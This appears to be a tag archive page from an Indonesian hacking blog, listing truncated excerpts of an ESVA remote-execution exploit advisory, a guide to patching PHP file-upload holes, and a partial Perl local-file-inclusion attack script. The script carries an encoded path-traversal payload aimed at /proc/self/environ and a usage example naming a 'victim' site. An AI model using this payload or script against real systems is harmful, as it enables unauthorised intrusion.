Home / Tag Archives: Http

Tag Archives: Http

E-Mail Security Virtual Appliance (ESVA) Exploit.

black-hat-logo

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution. # Date: 10 Aug 2012 # Exploit Author: iJoo # Vendor Homepage: http://www.esvacommunity.com/ # Software Link: http://sourceforge.net/projects/esva-project/ # Version: < 2.0.6 ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, …

Read More »

PHP Arbitrary File Upload Simple Patching

file-upload-patch

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload. Kebanyakan website yang vuln diupload memiliki garis besar seperti ini: Contoh simple upload.php file upload. [crayon-5d2cffbd0bbcc869609262/] Contoh form yang dipake dalam file index untuk upload: [crayon-5d2cffbd0bbd8716671643/] Disini tidak ada code yang memfilter upload filetype. Jadi kita bisa langsung saja …

Read More »

LFI Remote Execute in PERL

black-hat-logo

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Read More »